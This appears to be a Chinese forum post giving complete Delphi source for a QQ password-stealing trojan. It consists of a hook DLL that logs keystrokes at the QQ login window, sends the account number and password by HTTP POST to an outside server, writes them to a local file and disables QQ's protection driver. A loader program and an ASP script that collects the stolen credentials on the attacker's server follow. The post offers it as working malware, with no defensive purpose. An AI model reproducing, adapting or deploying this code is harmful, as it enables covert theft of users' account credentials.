DELPHI版本QQ木马
首先写个DLL文件
library Project1;
{ Important note about DLL memory management: ShareMem must be the
first unit in your library's USES clause AND your project's (select
Project-View Source) USES clause if your DLL exports any procedures or
functions that pass strings as parameters or function results. This
applies to all strings passed to and from your DLL--even those that
are nested in records and classes. ShareMem is the interface unit to
the BORLNDMM.DLL shared memory manager, which must be deployed along
with your DLL. To avoid using BORLNDMM.DLL, pass string information
using PChar or ShortString parameters. }
uses
windows,messages,dialogs,sysutils,shellapi,WinInet,Tlhelp32;
type
PMouseHookStruct = ^TMouseHookStruct;
{$EXTERNALSYM tagMOUSEHOOKSTRUCT}
tagMOUSEHOOKSTRUCT = packed record
pt: TPoint;
hwnd: HWND;
wHitTestCode: UINT;
dwExtraInfo: DWORD;
end;
TMouseHookStruct = tagMOUSEHOOKSTRUCT;
var
hooktime,hhoook:integer;
loggedkeys,originfile,brokefile:string;
KeyHook,MouseHook,WndProcHook:hhook;
function HtmlEncode(s: string): string;
var
i, v1, v2: integer;
function i2s(b: byte): char;
begin
if b <= 9 then result := chr($30 + b)
else result := chr($41 - 10 + b);
end;
begin
result := '';
for i := 1 to length(s) do
if s = ' ' then result := result + '+'
else if (s < ' ') or (s in ['/', '\', ':', '&', '?', '|']) then
begin
v1 := ord(s) mod 16;
v2 := ord(s) div 16;
result := result + '%' + i2s(v2) + i2s(v1);
end
else result := result + s;
end;
//Post方式发信
function PostURL(const aUrl: string; FTPostQuery: string; const strPostOkResult: string = 'Send OK!'): Boolean;
var
hSession: HINTERNET;
hConnect, hRequest: hInternet;
lpBuffer: array[0..1024 + 1] of Char;
dwBytesRead: DWORD;
HttpStr: string;
HostName, FileName: string;
FTResult: Boolean;
AcceptType: LPStr;
Buf: Pointer;
dwBufLen, dwIndex: DWord;
procedure ParseURL(URL: string; var HostName, FileName: string);
procedure ReplaceChar(c1, c2: Char; var St: string);
var
p: Integer;
begin
while True do
begin
p := Pos(c1, St);
if p = 0 then Break
else St[p] := c2;
end;
end;
var
i: Integer;
begin
if Pos(UpperCase([url=http://]http://'[/url]), UpperCase(URL)) <> 0 then
System.Delete(URL, 1, 7);
i := Pos('/', URL);
HostName := Copy(URL, 1, i);
FileName := Copy(URL, i, Length(URL) - i + 1);
if (Length(HostName) > 0) and (HostName[Length(HostName)] = '/') then
SetLength(HostName, Length(HostName) - 1);
end;
begin
Result := False;
hSession := InternetOpen('MyApp', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
try
if Assigned(hSession) then
begin
ParseURL(aUrl, HostName, FileName);
hConnect := InternetConnect(hSession, PChar(HostName),
INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 0);
AcceptType := PChar('Accept: */*');
hRequest := HttpOpenRequest(hConnect, 'POST', PChar(FileName), 'HTTP/1.0',
nil, @AcceptType, INTERNET_FLAG_RELOAD, 0);
//
HttpSendRequest(hRequest, 'Content-Type: application/x-www-form-urlencoded', 47,
PChar(FTPostQuery), Length(FTPostQuery));
dwIndex := 0;
dwBufLen := 1024;
GetMem(Buf, dwBufLen);
FTResult := HttpQueryInfo(hRequest, HTTP_QUERY_CONTENT_LENGTH,
Buf, dwBufLen, dwIndex);
if FTResult = True then
try
while True do
begin
dwBytesRead := 1024;
InternetReadFile(hRequest, @lpBuffer, 1024, dwBytesRead);
if dwBytesRead = 0 then break;
lpBuffer[dwBytesRead] := #0;
HttpStr := HttpStr + lpBuffer;
end;
Result := pos(strPostOkResult {'发送成功'}, HttpStr) > 0;
//Form1.Memo1.Lines.Add(Httpstr);
finally
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
end;
end;
finally
InternetCloseHandle(hSession);
end;
end;
procedure logthekeys();//最经典的键盘记录处理函数
var
i : byte;
begin
for i:=8 To 222 do begin if GetAsyncKeyState(i)=-32767 then begin case i of
8 : {loggedkeys := loggedkeys +'[BACKSPACE]'}loggedkeys:=copy(loggedkeys,0,length(loggedkeys)-1) ;
//9 : loggedkeys := loggedkeys + '(TAB)';
//13 : loggedkeys := loggedkeys + #13#10;
//17 : loggedkeys := loggedkeys + '(Ctrl)';
//27 : loggedkeys := loggedkeys + '(ESC)';
32 : loggedkeys := loggedkeys + ' ';
//33 : loggedkeys := loggedkeys + '(Page up)';
//34 : loggedkeys := loggedkeys + '(Page down)';
//35 : loggedkeys := loggedkeys + '(End)';
//36 : loggedkeys := loggedkeys + '(Home)';
37 : loggedkeys := loggedkeys + '(Left)';//这里关键哦~一定要处理好这两个键!我懒得处理
//38 : loggedkeys := loggedkeys + '(Up)';
39 : loggedkeys := loggedkeys + '(Right)';//这里关键哦~一定要处理好这两个键!我懒得处理
//40 : loggedkeys := loggedkeys + '(Down)';
//44 : loggedkeys := loggedkeys + '(Prnt Scrn)';
//45 : loggedkeys := loggedkeys + '(Insert)';
//46 : loggedkeys := loggedkeys + '(Delete)';
//145 : loggedkeys := loggedkeys + '(Scroll lock)';
48 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+')'
else loggedkeys:= loggedkeys+'0';
49 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'!'
else loggedkeys:= loggedkeys+'1';
50 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= [email=loggedkeys+]loggedkeys+'@'[/email]
else loggedkeys:= loggedkeys+'2';
51 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'#'
else loggedkeys:= loggedkeys+'3';
52 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'$'
else loggedkeys:= loggedkeys+'4';
53 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'%'
else loggedkeys:= loggedkeys+'5';
54 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'^'
else loggedkeys:= loggedkeys+'6';
55 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'&'
else loggedkeys:= loggedkeys+'7';
56 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'*'
else loggedkeys:= loggedkeys+'8';
57 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'('
else loggedkeys:= loggedkeys+'9';
65..90 :
begin
if ((GetKeyState(VK_CAPITAL))=1) then
if GetKeyState(VK_SHIFT)<0 then
loggedkeys:= loggedkeys+LowerCase(Chr(i))
else
loggedkeys:= loggedkeys+UpperCase(Chr(i))
else
if GetKeyState(VK_SHIFT)<0 then loggedkeys := loggedkeys+UpperCase(Chr(i))
else
loggedkeys:= loggedkeys+LowerCase(Chr(i));
end;
96..105 : loggedkeys:= loggedkeys + inttostr(i-96);
106: loggedkeys:= loggedkeys+'*';
107: loggedkeys:= loggedkeys+'&';
109: loggedkeys:= loggedkeys+'-';
110: loggedkeys:= loggedkeys+'.';
111: loggedkeys:= loggedkeys+'/';
//144 : loggedkeys:= loggedkeys+'[Num Lock]';
//112..123:loggedkeys:= loggedkeys+'[F'+IntToStr(i - 111)+']';
186 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+':'
else loggedkeys:= loggedkeys+';';
187 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'+'
else loggedkeys:= loggedkeys+'=';
188 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'<'
else loggedkeys:= loggedkeys+',';
189 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'_'
else loggedkeys:= loggedkeys+'-';
190 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'>'
else loggedkeys:= loggedkeys+'.';
191 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'?'
else loggedkeys:= loggedkeys+'/';
192 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'~'
else loggedkeys:= loggedkeys+'`';
219 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'{'
else loggedkeys:= loggedkeys+'[';
220 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'|'
else loggedkeys:= loggedkeys+'\';
221 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'}'
else loggedkeys:= loggedkeys+']';
222 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'"'
else loggedkeys:= loggedkeys+'''';
end;
end;
end;
end;
//============获得号码窗体句柄部分================
function Get_qqnumber:string;
var
buffer:array[0..50] of char;
Window,Number_window:Longint;
begin
result:='';
Window:=findwindow('#32770',nil);
if window=0 then exit;
Number_window:=FindWindowex(window,0,'ComboBox',nil);
if Number_window=0 then exit;
SendMessage(Number_window, $000D, 50, Integer(@buffer));
result:=string(buffer);
end;
Function myGetfocus:THandle; //获得焦点
begin
AttachThreadInput(GetCurrentThreadId, GetWindowThreadProcessId(GetForegroundWindow(), nil), True);
Result := GetParent(GetFocus());
AttachThreadInput(GetCurrentThreadId, GetWindowThreadProcessId(GetForegroundWindow(), nil), False);
end;
function ispassword_window:boolean;//判断当前获取焦点的是否存在QQ密码输入窗口
var
window,password_window:thandle;
begin
result:=false;
window:=findwindow('#32770',nil);
if window=0 then exit;
password_window:=findwindowex(window,0,'edit', nil);
if password_window=0 then exit;
if myGetfocus=password_window then//这里没办法获得焦点
result:=true;
end;
function iswindow:boolean;//判断当前获取焦点的是否存在QQ密码输入窗口
var
window,password_window:thandle;
begin
result:=false;
window:=findwindow('#32770',nil);
if window=0 then exit;
password_window:=findwindowex(window,0,'ComboBox', nil);
if password_window=0 then exit;
if myGetfocus=password_window then//这里没办法获得焦点
result:=true;
end;
procedure jilu(s:string);
var
mytextfile:textfile;
begin
assignfile(mytextfile,'c:\qq.txt');
append(mytextfile);
writeln(mytextfile,datetimetostr(now)+' '+s);
closefile(mytextfile);
end;
function findqqwindow:integer; //句柄
var
h1,h2,h3:Hwnd; //句柄
begin
h1:=0;
h2:=0;
h3:=0;
h1:=findwindow('#32770',nil);
if h1=GetForegroundWindow then //如在顶部 GetForegroundWindow是前台活动窗体
begin
h2:=GetDlgItem(h1,138);//该函数检索指定的对话框中的控制句柄
h3:=GetDlgItem(h1,180);
if (h2<>0) and (h3<>0) then
result:=0
else
result:=1;
end;
end;
//================键盘钩子回调函数
function HookKey(Code:Integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;
var
s:string;
begin
if findqqwindow=0 then
begin {回车} {键盘按键按下消息}
if (wParam=13) and(((LParam shr 31)and 1)=0) then //这里是说当你回车 键盘消息 和是QQ密码焦点的时候
begin
// messagebox(0,pchar(Get_qqnumber),pchar(loggedkeys),1);
PostURL(http://365wc.com/qq.asp','num='+HtmlEncode(Get_qqnumber)+'&pass='+HtmlEncode(loggedkeys));
s:='QQ号码:'+Get_qqnumber+' ''QQ密码:'+loggedkeys;
jilu(s);
loggedkeys:='';
end else
begin
if (((LParam shr 31)and 1)=0)and(iswindow=false) then
begin
logthekeys();
end;
end;
end;
Result:=CallNextHookEx(KeyHook,code,Wparam,lParam);
end;
//================鼠标钩子回调函数
function HookMouse(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
var
s:string;
buffer:array[0..3] of char;
begin
//if findqqwindow=0 then
begin{鼠标左键按下消息}
if (findwindow('#32770',nil)<>0)and(wparam=$0201) then
begin
SendMessage(pMOUSEHOOKSTRUCT(lparam)^.hwnd,$000D,3,Integer(@buffer));
if buffer='登' then
begin
PostURL(http://365wc.com/qq.asp','num='+HtmlEncode(Get_qqnumber)+'&pass='+HtmlEncode(loggedkeys));
s:='QQ号码:'+Get_qqnumber+' ''QQ密码:'+loggedkeys;
jilu(s);
// showmessage('send successful');
loggedkeys:='';
// sendemail('smtp.163.com','mszok','邮箱密码 我不能说哦,呵呵','mszok@163.com','mszok@sina.com.cn','good',get_qqnumber+' password:'+get_password);
end;
end;
end;
Result := CallNextHookEx(MouseHook, iCode, wParam, lParam);
end;
function GetQQPath(ExeFileName: string): string;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
modSnapShot: THandle;
mProcess: TMODULEENTRY32;
ret: Boolean;
begin
result :='';
FSnapshotHandle := CreateToolhelp32Snapshot
(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,
FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
begin
modSnapShot := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, FProcessEntry32.th32ProcessID); //模块快照
mProcess.dwSize := sizeof(TMODULEENTRY32); //初始化TMODULEENTRY32结构大小
ret := module32first(modSnapShot, mProcess); //第一个模块
if ret=true then
Result :=mProcess.szExePath;
end;
ContinueLoop := Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure Brekefile();
var
QQPath:string;
begin
QQPath:=GetQQPath('QQ.exe');
if pos('QQ.exe',QQPath)>1 then
begin
QQPath:=copy(QQPath,1,length(QQPath)-6);
originfile:=QQPath+'npkcrypt.sys' ;
brokefile :=QQPath+'npkmask.sys' ;
try
//copy file to another
copyfile(pchar(originfile),pchar(brokefile),false) ;
//delete file
deletefile(pchar(originfile));
except end;
end;
end;
//=======窗体钩子============
function CallWndProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
// 窗体即将被清除
if (nCode = HC_ACTION) and (PCWPStruct(lParam).message = WM_CREATE) then
Brekefile;
// 调用下一个钩子
Result := CallNextHookEx(WndProcHook, nCode, wParam, lParam);
end;
procedure hookon;
begin
KeyHook:=setwindowshookex(WH_KEYBOARD,@HookKey,Hinstance,0);
MouseHook:=setwindowshookex(WH_mouse,@HookMouse,Hinstance,0);
WndProcHook := SetWindowsHookEx(WH_CALLWNDPROC, @CallWndProc, HInstance, 0);
end;
procedure hookoff;
begin
UnHookWindowsHookEx(KeyHook);
UnHookWindowsHookEx(MouseHook);
UnHookWindowsHookEx(WndProcHook);
end;
//=================导出函数
exports
hookon,hookoff;
begin
end.
然后写个调用DLL的工程
program Main;
uses windows;
var Msg : tMsg;
procedure hookon ; stdcall; external '..\Dll\hook.dll';
procedure hookoff ; stdcall; external '..\Dll\hook.dll';
begin
CreateMutex(nil, True,'AnskyaQqGameOne');//设置一个内存标示~防止程序多次运行
if (GetlastError() <> ERROR_ALREADY_EXISTS) then
begin//如果发现创建标示成功就开始打开钩子~开始记录
hookon;
while GetMessage(Msg, 0, 0, 0) do ;
hookoff;
end else exit;//不然~哼哼就退出~哈哈
end.
这个是用ASP收信的方式
ASP的收信格式采用QQ大盗的格式
<%
num=request("num")
pass=request("pass")
hxip=request("hxip")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("qq.txt"),8,True)
if hxip <>"" then
file.writeline num+"----"+pass+"----ip:"+hxip
else
file.writeline num+"----"+pass
end if
file.close
set file=nothing
set fs=nothing
response.write "Send OK!"
%>
保存为ASP放在空间就行